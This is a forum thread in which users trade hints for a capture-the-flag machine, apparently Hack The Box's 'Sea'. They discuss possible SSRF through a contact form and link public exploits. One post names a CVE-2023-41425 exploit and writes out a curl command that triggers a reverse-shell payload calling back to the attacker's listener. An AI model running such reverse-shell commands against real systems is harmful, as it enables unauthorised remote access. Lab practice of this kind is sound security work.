Posts: 33
Threads: 3
Joined: Sep 2023
Right now im kind of thinking some kind of SSRF (server side request forgery vulerability on that contact.php form. ) Since it seems to be reaching out to what ever website we put in the form
might be possible to have it reach out to the box its self making request to access resources on the box from its self thus bypassing normal security policies cause the box trust its self. This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for reputation
Posts: 2
Threads: 0
Joined: Aug 2024
Posts: 219
Threads: 14
Joined: Apr 2024
(Aug 10, 2024, 09:17 PM)abhiramhtb Wrote: https://packetstormsecurity.com/files/17...ution.html
try this
bro where is the login path This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
Posts: 28
Threads: 0
Joined: Aug 2024
(Aug 10, 2024, 09:17 PM)abhiramhtb Wrote: https://packetstormsecurity.com/files/17...ution.html
try this
did you find the login page?
Posts: 26
Threads: 2
Joined: Jul 2024
(Aug 10, 2024, 09:21 PM)osamy7593 Wrote: (Aug 10, 2024, 09:17 PM)abhiramhtb Wrote: https://packetstormsecurity.com/files/17...ution.html
try this
bro where is the login path
there is no login page, that CVE is not applicable. The way forward is exploiting SSRF on the website I believe, there is nothing else
Posts: 12
Threads: 0
Joined: Jul 2024
(Aug 10, 2024, 09:23 PM)kewlcat002 Wrote: (Aug 10, 2024, 09:21 PM)osamy7593 Wrote: (Aug 10, 2024, 09:17 PM)abhiramhtb Wrote: https://packetstormsecurity.com/files/17...ution.html
try this
bro where is the login path
there is no login page, that CVE is not applicable. The way forward is exploiting SSRF on the website I believe, there is nothing else
yes there is, check /loginURL
Posts: 9
Threads: 0
Joined: Jun 2024
Posts: 78
Threads: 16
Joined: Jul 2024
USER FLAG
https://github.com/prodigiousMind/CVE-2023-41425 Use this exploit for revshell and listen in an port then run the command curl 'http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.x.x&lport=9001' This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Selling in HTB | Trying to sell information posted for free
Posts: 2
Threads: 0
Joined: Aug 2024
(Aug 10, 2024, 09:23 PM)kewlcat002 Wrote: (Aug 10, 2024, 09:21 PM)osamy7593 Wrote: (Aug 10, 2024, 09:17 PM)abhiramhtb Wrote: https://packetstormsecurity.com/files/17...ution.html
try this
bro where is the login path
there is no login page, that CVE is not applicable. The way forward is exploiting SSRF on the website I believe, there is nothing else
yes please check man
Posts: 14
Threads: 0
Joined: Mar 2024
I think SSRF is the way to exploit the server. Found that the server hitting back to the attack machine. It need to bypass something I think.
|
